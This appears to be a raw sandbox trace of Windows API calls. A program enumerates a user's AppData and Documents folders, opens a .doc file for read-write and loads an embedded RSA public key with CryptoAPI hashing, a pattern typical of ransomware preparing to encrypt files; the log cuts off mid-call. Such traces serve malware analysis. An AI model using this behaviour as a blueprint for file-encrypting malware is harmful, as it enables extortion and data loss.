[0206.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.279] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.279] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.279] PathFindFileNameW (pszPath="") returned="" [0206.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeff8 | out: hHeap=0x2c0000) returned 1 [0206.279] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.280] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0206.280] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec8 | out: hHeap=0x2c0000) returned 1 [0206.280] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.280] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0206.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0206.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.280] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.280] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.280] PathFindFileNameW (pszPath="") returned="" [0206.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0206.281] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.281] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0206.281] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0206.282] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0206.282] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd78 | out: hHeap=0x2c0000) returned 1 [0206.282] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.282] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0206.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0206.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0206.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0206.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.282] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.282] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.282] PathFindFileNameW (pszPath="") returned="" [0206.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321628 | out: hHeap=0x2c0000) returned 1 [0206.283] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.283] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AU", cAlternateFileName="")) returned 1 [0206.283] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0206.283] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 1 [0206.283] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 0 [0206.283] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0206.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0206.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0206.284] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0206.284] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0206.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\") returned="dDSiV9mIqla-\\" [0206.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\") returned="F RRWNCvdbx\\" [0206.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\") returned="fZpil8Uu6QzTlWoWB\\" [0206.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0206.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0206.284] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0206.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.284] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0206.284] PathFindFileNameW (pszPath="") returned="" [0206.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfa08c30, ftCreationTime.dwHighDateTime=0x1d5d8a0, ftLastAccessTime.dwLowDateTime=0xba4b15b0, ftLastAccessTime.dwHighDateTime=0x1d5dcb2, ftLastWriteTime.dwLowDateTime=0xba4b15b0, ftLastWriteTime.dwHighDateTime=0x1d5dcb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0206.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b77c48 | out: hHeap=0x2c0000) returned 1 [0206.286] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfa08c30, ftCreationTime.dwHighDateTime=0x1d5d8a0, ftLastAccessTime.dwLowDateTime=0xba4b15b0, ftLastAccessTime.dwHighDateTime=0x1d5dcb2, ftLastWriteTime.dwLowDateTime=0xba4b15b0, ftLastWriteTime.dwHighDateTime=0x1d5dcb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0206.286] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc26a3fc0, ftCreationTime.dwHighDateTime=0x1d5e11a, ftLastAccessTime.dwLowDateTime=0x44de9b80, ftLastAccessTime.dwHighDateTime=0x1d5e50e, ftLastWriteTime.dwLowDateTime=0x44de9b80, ftLastWriteTime.dwHighDateTime=0x1d5e50e, nFileSizeHigh=0x0, nFileSizeLow=0xe4c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dd5jA.doc", cAlternateFileName="")) returned 1 [0206.286] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\dd5jA.doc") returned=".doc" [0206.286] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\dDSiV9mIqla-\\dd5jA.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\ddsiv9miqla-\\dd5ja.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.287] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=58564) returned 1 [0206.287] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.290] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xe49e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.290] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.291] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xe4c4, lpOverlapped=0x0) returned 1 [0206.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.292] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.293] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.293] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.293] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.293] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.293] GetLastError () returned 0x0 [0206.293] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.293] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.293] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.293] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.293] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.293] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b30 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b48 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b78 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79b48 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79b30 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72ec8 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72b80 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b48 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b30 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79b78 | out: hHeap=0x2c0000) returned 1 [0206.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.295] GetCurrentThreadId () returned 0x600 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32ff988 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.295] GetCurrentThreadId () returned 0x600 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) 